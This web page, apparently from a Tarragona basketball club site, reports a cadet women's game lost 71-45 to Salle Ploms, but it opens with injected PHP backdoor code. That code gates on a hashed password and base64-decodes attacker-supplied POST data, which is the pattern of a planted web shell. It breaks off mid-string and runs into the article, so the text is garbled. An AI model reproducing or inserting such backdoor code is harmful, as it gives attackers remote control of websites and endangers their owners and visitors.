function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 1 no pot amb la intensitat del líder, Salle Ploms (71-45) - Tgn Bàsquet Club -

El cadet femení 1 no pot amb la intensitat del líder, Salle Ploms (71-45)

Updated: desembre 16, 2015

El cadet femení 1 del TGN Bàsquet va caure a la pista del líder invicte, el Salle Ploms, que va fonamentar el seu domini en la intensitat defensiva. Les tarrgonines van sortir molt fortes i en els primers 4 minuts de partit el marcador mostrava un resultat d’1-4. A partir d’aleshores, la intensitat en el joc de les locals va desfer la resistència visitant i el període va finalitzar amb un resultat de 24-8. En el segon quart va ser una repetició del primer (45-19 al descans) i només la bona actuació en el tercer període (5-16 de parcial i 50-35 al minut 27), va permetre tenir alguna esperança que, però, es va esvair en l’últim quart.